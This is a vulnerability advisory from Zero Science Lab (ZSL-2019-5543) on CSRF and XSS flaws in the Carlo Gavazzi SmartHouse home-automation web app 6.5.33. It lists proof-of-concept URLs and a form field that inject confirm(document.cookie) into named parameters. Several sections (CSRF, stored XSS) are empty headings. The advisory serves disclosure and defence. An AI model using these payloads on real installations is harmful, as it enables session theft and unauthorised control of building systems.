Carlo Gavazzi SmartHouse version 6.5.33 suffers from cross site request forgery along with both reflective and persistent cross site scripting vulnerabilities.
Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities
Vendor: Carlo Gavazzi Automation S.p.A
Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
Affected version: Web-app: 220.127.116.1172501
Summary: Carlo Gavazzi is an international company that develops, manufactures
and sells electrical automation components. Our products are used in industrial
automation and real estate automation. Smart-house is based on a system that we
have developed and produced since 1986, mainly for industrial-related installations.
Our system is present in more than 150,000 installations. For a few years now, we
have focused our development on smart electrical installations for home and property
automation. Smart-house is currently installed in both villas and commercial properties.
Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site. Input passed
to several GET/POST parameters is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session
in context of an affected site.
Tested on: Apache
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2019-5543
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
Reflected XSS (GET):
1. http://192.168.0.24/app/index.php?error=Waddup">confirm(document.cookie) (pre-auth)
2. http://192.168.0.24/app/messagepage.php?msg=confirm(document.cookie) (pre-auth)
3. http://192.168.0.24/app/detaf.php?p=0&l=50">confirm(document.cookie)&f=5658 (post-auth)
4. http://192.168.0.24/app/detaf.php?p=0">confirm(document.cookie)&l=50&f=5658 (post-auth)
5. http://192.168.0.24/?functionsh=list&part=fn__intrudermain001&part=fn__intrudersec002&name=IntruderMainFunction">confirm(document.cookie)&grpl=1 (post-auth)
CSRF set temperature:
Stored XSS (POST):
Reflected XSS (POST):
<input type="hidden" name="param" value="switch0251confirm(document.cookie)" />